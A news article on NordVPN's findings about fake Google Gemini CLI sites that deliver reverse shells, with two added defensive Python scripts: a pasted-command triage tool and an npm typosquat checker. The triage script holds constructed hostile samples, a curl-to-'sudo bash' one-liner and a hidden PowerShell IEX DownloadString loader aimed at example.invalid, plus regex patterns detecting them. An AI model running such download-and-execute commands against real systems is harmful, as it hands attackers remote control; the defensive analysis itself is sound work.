NordVPN has uncovered a cluster of active malicious campaigns impersonating the official Google Gemini command-line interface (CLI).
Attackers are creating fake websites, cloned repositories, and misleading social media posts to trick developers and other users into installing what appears to be an unofficial or early-access version of Gemini's developer tool.
Instead of delivering legitimate software, however, the campaigns distribute a reverse shell, giving the attacker full and unrestricted remote control of the compromised machine, with no further action required on their part.
“The payloads being delivered here grant full remote access to a victim’s machine, which makes this a serious threat regardless of how technically sophisticated the target is.”
The attack has both macOS and Windows versions. On macOS, it starts with a convincing clone of the official Google Gemini CLI web page, which instructs the user to run an innocuous-looking command in their terminal.
However, this command is Base64-encoded, which obscures what it actually does. Base64 is a reversible encoding rather than encryption, so the command can be inspected by decoding it before anything is run.
“Once decoded, the command downloads a malicious script from a remote server and immediately runs it with the highest administrative privileges available on the system,” the researchers said.
“It means the attacker’s code can read, modify, or delete any file on the device, install additional malware, or use the compromised Mac as a launchpad to access corporate networks the device is connected to.”
The Windows variant uses a different delivery method. A PowerShell command, dressed up with variable names such as $Install='GeminiCLI' so that it looks like a legitimate software setup process, connects to a remote server and executes malicious code directly in the device's memory.
Running code in memory rather than writing it to disk, a so-called fileless attack, evades traditional antivirus software that scans files for known threats, although PowerShell script block logging and AMSI can still expose the decoded script to behavioral detection.
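As an added example, not NordVPN's or Google's code, the following Python script performs the check a practitioner would make before pasting either command: it decodes any long Base64 token in the command (trying UTF-16LE first, as used by PowerShell's -EncodedCommand, then UTF-8, as used by a shell `base64 -d` pipeline) and flags the indicators from both variants described above, a download piped into `sudo bash` and an in-memory IEX/DownloadString fetch. The sample commands and the host example.invalid are constructed for illustration and are not indicators from the campaign.

```python
"""Triage a copy-pasted install command before running it.

Added example, not NordVPN's or Google's code. The sample commands and the
host example.invalid are constructed to mirror the pattern described in the
article; they are not real indicators from the campaign.
"""
import base64
import binascii
import re

# Indicators worth a manual review when found in a command or in its decoded payload.
RISK_PATTERNS = {
    "download_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "privilege_escalation": re.compile(r"\bsudo\b"),
    "ps_in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "ps_remote_fetch": re.compile(r"downloadstring|invoke-webrequest|\biwr\b", re.I),
    "ps_hidden_window": re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    "base64_decode_stage": re.compile(r"base64\s+(-d|--decode)|frombase64string|-encodedcommand", re.I),
}

# A run of Base64 alphabet long enough to hide a command (shorter runs are usually flags or names).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_tokens(cmd: str) -> list[str]:
    """Decode every long Base64 token in cmd that yields printable ASCII text.

    PowerShell's -EncodedCommand carries UTF-16LE; a shell `base64 -d`
    pipeline carries UTF-8. Both are tried, in that order, and a decoding is
    kept only if it is printable ASCII (decoding UTF-8 bytes as UTF-16LE
    produces non-ASCII garbage, and the reverse produces NUL bytes).
    """
    decoded = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text):
                decoded.append(text)
                break
    return decoded


def triage(cmd: str) -> dict:
    """Return the decoded payloads and the sorted indicators matched in the
    outer command (with Base64 tokens masked) or in any decoded payload."""
    decoded = decode_base64_tokens(cmd)
    findings = set()
    for text in [B64_TOKEN.sub("<token>", cmd), *decoded]:
        for name, pattern in RISK_PATTERNS.items():
            if pattern.search(text):
                findings.add(name)
    return {"decoded": decoded, "findings": sorted(findings)}


# Constructed samples (not real indicators): the macOS "paste this" one-liner,
# the Windows in-memory loader, and a benign install for comparison.
MAC_INNER = "curl -fsSL https://example.invalid/gemini-cli.sh | sudo bash"
MAC_SAMPLE = "echo %s | base64 -d | sh" % base64.b64encode(MAC_INNER.encode()).decode()
WIN_INNER = ("$Install='GeminiCLI'; "
             "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/setup.ps1')")
WIN_SAMPLE = "powershell -w hidden -EncodedCommand " + base64.b64encode(WIN_INNER.encode("utf-16-le")).decode()
BENIGN_SAMPLE = "npm install -g @google/gemini-cli"

if __name__ == "__main__":
    for label, cmd in (("macOS", MAC_SAMPLE), ("Windows", WIN_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = triage(cmd)
        print(label, "decoded:", result["decoded"], "findings:", result["findings"])
```

Any non-empty `findings` list means the command should be read in full, decoded, before it is run; the script never executes anything it decodes.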
Alongside these direct attacks, NordVPN's researchers also found a typosquatting operation targeting the npm ecosystem. Fake package names, including gemini/cli and gemini-cli, were registered or being prepared to mimic the official package, which is published under the @google scope as @google/gemini-cli.
“The strategy exploits a common habit among developers of omitting the organization prefix when searching for or installing packages,” the researchers warned.
“Although the fake package had not yet appeared in the npm registry at the time of analysis, its preparation signals an active and imminent threat. Once published, any developer who installs it by mistyping the package name could unknowingly execute malicious code.”
How to stay safe
NordVPN advised users to be wary of any website, forum post, or social media message offering early or unofficial access to developer tools, and to stick to official sources, which in this case means the official Google repository.
Never run a terminal or PowerShell command you didn’t write yourself unless you fully understand what it does, the firm warned, pointing out that legitimate software installers don’t ask users to copy and paste commands from a webpage.
Similarly, developers should verify package names in full before installation, including the scope prefix: the official package is @google/gemini-cli, not gemini/cli or gemini-cli.
Nord also advised using security software that includes behavioral detection, not just file-based scanning, since fileless attacks are specifically engineered to bypass traditional antivirus tools.
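As an added example that is not part of the article or of the Gemini CLI project, here is a small Python pre-install check that compares a requested npm package name against the expected scoped name, assuming the official package is @google/gemini-cli. It recognises the missing-scope form (gemini-cli) and the split-scope form (gemini/cli) the article mentions, as well as a wrong scope and near-miss spellings; the other lookalike names in the samples are constructed.

```python
"""Check a requested npm package name against the expected official name.

Added example, not part of the article or of the Gemini CLI project. It
assumes the official package is published as @google/gemini-cli; the
lookalike names in the samples are the ones the article lists plus
constructed variants.
"""
import re

OFFICIAL = ("@google/gemini-cli",)

# npm names: optional "@scope/" (the "@" is often dropped when typed), then a lowercase name.
NPM_NAME = re.compile(r"^(?:@?([a-z0-9][a-z0-9._-]*)/)?([a-z0-9][a-z0-9._-]*)$")


def split_name(spec: str) -> tuple:
    """Return (scope, bare_name), dropping a trailing @version or @tag spec."""
    if "@" in spec[1:]:
        spec = spec[: spec.rindex("@")]
    m = NPM_NAME.match(spec)
    if not m:
        raise ValueError(f"not a valid npm package name: {spec!r}")
    return m.group(1), m.group(2)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(requested: str, official=OFFICIAL) -> tuple:
    """Return (verdict, canonical_name).

    Verdicts: "ok" (exact, or the "@"-less spelling of an official name),
    "missing-scope", "wrong-scope", "split-into-scope", "lookalike", "unknown".
    Only "ok" should pass through an install script without a prompt.
    """
    scope, bare = split_name(requested)
    for name in official:
        o_scope, o_bare = split_name(name)
        if scope == o_scope and bare == o_bare:
            return ("ok", name)
        if scope is None and bare == o_bare:
            return ("missing-scope", name)        # gemini-cli
        if scope is not None and bare == o_bare:
            return ("wrong-scope", name)          # @gogle/gemini-cli (constructed)
        if scope is not None and f"{scope}-{bare}" == o_bare:
            return ("split-into-scope", name)     # gemini/cli
        if levenshtein(bare, o_bare) <= 2:
            return ("lookalike", name)            # gemini-clii (constructed)
    return ("unknown", None)


if __name__ == "__main__":
    # The article's two fake names plus constructed variants and a benign control.
    for sample in ("@google/gemini-cli", "google/gemini-cli", "gemini-cli", "gemini/cli",
                   "@gogle/gemini-cli", "gemini-clii", "gemini-cli@1.0.0", "lodash"):
        print(f"{sample:22} -> {classify(sample)}")
```

Wrapping `npm install` in a script that calls `classify` and refuses anything other than "ok" is enough to stop the omitted-prefix mistake the researchers describe, without any network lookup.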
ITPro approached Google for comment, but did not receive a response by time of publication.